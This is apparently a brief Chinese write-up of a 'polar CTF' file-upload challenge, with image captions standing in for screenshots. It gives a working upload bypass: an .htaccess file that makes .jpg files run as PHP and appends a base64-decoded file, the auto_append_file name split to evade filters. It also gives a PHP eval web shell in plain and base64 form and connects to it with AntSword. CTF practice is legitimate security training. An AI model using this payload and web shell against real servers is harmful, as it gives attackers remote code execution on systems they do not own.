polar CTF上传

1、题目
polar CTF上传_第1张图片
2、经过测试.htaccess绕过
三行代码解析:
将上传的.jpg文件解析成php文件
auto_append_file包含上传的文件
将上传的文件进行解码

AddType application/x-httpd-php .jpg
php_value auto_append_fi\
le "php://filter/convert.base64-decode/resource=1.jpg"

polar CTF上传_第2张图片

3、上传文件名为1.jpg的图片码
马为

<?php eval($_POST[c]); ?>

base64后为

PD9waHAgZXZhbCgkX1BPU1RbY10pOyA/Pg==

polar CTF上传_第3张图片
访问为
polar CTF上传_第4张图片
蚁剑连接
polar CTF上传_第5张图片

你可能感兴趣的:(CTF,web安全)